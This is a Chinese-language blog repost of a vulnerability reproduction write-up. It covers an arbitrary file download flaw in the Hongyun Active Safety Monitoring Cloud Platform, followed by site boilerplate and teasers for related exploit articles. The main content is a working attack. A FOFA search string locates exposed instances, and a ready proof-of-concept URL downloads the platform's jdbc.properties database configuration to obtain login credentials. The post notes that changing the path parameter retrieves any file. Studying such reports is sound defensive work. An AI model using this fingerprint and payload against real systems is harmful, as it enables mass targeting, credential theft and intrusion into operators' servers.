鸿运主动安全云平台任意文件下载漏洞复习

这篇具有很好参考价值的文章主要介绍了鸿运主动安全云平台任意文件下载漏洞复习。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

简介

深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞,攻击者可通过此漏洞下载网站配置文件等获得登录账号密码

漏洞复现

FOFA语法:body="./open/webApi.html"

鸿运主动安全云平台任意文件下载漏洞复习,漏洞复现,安全

获取网站数据库配置文件

鸿运主动安全云平台任意文件下载漏洞复习,漏洞复现,安全

POC:/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

访问 http://ip:port//808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

可直接下载到该文件

鸿运主动安全云平台任意文件下载漏洞复习,漏洞复现,安全

替换path=后的文件可导致任意文件下载:

鸿运主动安全云平台任意文件下载漏洞复习,漏洞复现,安全文章来源地址https://www.toymoban.com/news/detail-743363.html

到了这里,关于鸿运主动安全云平台任意文件下载漏洞复习的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 记一次任意文件下载到Getshell

    任意文件下载(Arbitrary File Download)是一种常见的 Web 攻击技术,用于窃取服务器上任意文件的内容。攻击者利用应用程序中的漏洞,通过构造恶意请求,使应用程序将任意文件(如配置文件、敏感数据等)发送给攻击者。一旦攻击者成功利用这种漏洞,就可以从服务器上获取

    2024年02月08日
    浏览(45)
  • 解决从github下载资源慢的问题,加速下载任意文件

    如果你是一个开发者,你一定经常需要从github上下载一些开发软件或工具,但是你是否遇到过这样的问题:下载速度慢得让人抓狂,甚至有时候还会下载失败?你是否想过有没有什么办法可以让github下载变得快速而稳定呢? 今天,我就要告诉你一个简单而有效的方法,让你从

    2024年02月13日
    浏览(44)
  • 若依 4.7.6 版本 任意文件下载漏洞(审计复现)

    https://mp.weixin.qq.com/s/IrqLp2Z3c941NiN0fFcDMA 这是一个最新版漏洞 先说审计后结论,要实现 任意文件下载 漏洞,需要执行3次请求(Tips:需要先登录RouYi) 1、新增计划任务 2、执行新增的计划任务 3、访问下载文件接口 参考文章里给出 POC 1 和 POC 2(没有给出内部实现关键信息,尝

    2023年04月11日
    浏览(42)
  • 致远OA SQL&任意文件下载漏洞(含批量检测POC)

    致远OA A6 test.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器 漏洞影响 致远OA A6 网络测绘 app=“致远OA6” 批量检测POC 当然扫描结果可能不是特别准确,可能因素是网络测绘工具根据语法收集的ip有出入,或者有waf检测到恶意流量跳转到防护页面等,状态码也是

    2024年02月07日
    浏览(64)
  • 【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞

    通达OA get_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件。 ● 通达OA2011 ● hunter app.name=\\\"通达 OA\\\" ● 特征

    2024年02月21日
    浏览(63)
  • google浏览器下载文件提示无法安全地下载怎么解决?

    在使用google浏览器下载文件的时候,弹出了“无法安全下载”的提示,搞了文件都下载不下来,网上查了一下,是因为chrome认为使用非https链接下载文件是不安全的,在新版本中阻止了用户下载。 目录 1、打开google浏览器的设置

    2024年04月24日
    浏览(46)
  • 谷歌浏览器下载文件提示无法安全地下载怎么解决?

    程序代码园发文地址: 谷歌浏览器下载文件提示无法安全地下载怎么解决?-程序代码园 小说,Java,HTML,Java小工具,程序代码园,http://www.byqws.com/ ,谷歌浏览器下载文件提示无法安全地下载怎么解决? http://www.byqws.com/blog/1067.html        今天有同事说在谷歌浏览器中下载文件,弹出

    2024年02月07日
    浏览(70)
  • SecureBridge安全文件下载的组件Crack

    SecureBridge包括SSH、SSL和SFTP客户端和服务器组件。它使用SSH或SSL安全传输层协议和加密消息语法来保护任何TCP流量,这些协议为客户端和服务器提供身份验证、强数据加密和数据完整性验证。SecureBridge组件可以与数据访问组件结合使用,以防止在不受信任的网络中拦截或修改数

    2024年02月12日
    浏览(35)
  • 安防视频云平台/可视化监控云平台ARM版EasyCVR无法下载录像文件,如何解决?

    视频集中存储/云存储/视频监控管理平台EasyCVR能在复杂的网络环境中,将分散的各类视频资源进行统一汇聚、整合、集中管理,实现视频资源的鉴权管理、按需调阅、全网分发、智能分析等。GB28181视频监控/AI智能大数据视频分析EasyCVR平台已经广泛应用在工地、工厂、园区、

    2024年01月17日
    浏览(65)
  • 如何下载头歌平台在线实验闯关中的文件到本地进行查看

    相信有很多同学在类似头歌平台上面做实验的时候,喜欢把代码复制到本地环境去运行调试,然后再将调试好的代码复制回去然后提交通过,不过如果你是做有关数据分析处理实验的话,题目会用到各种文件,例如Excel、TXT、CSV文件等,但是我们一般看不见这个文件,也不好

    2024年02月08日
    浏览(201)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包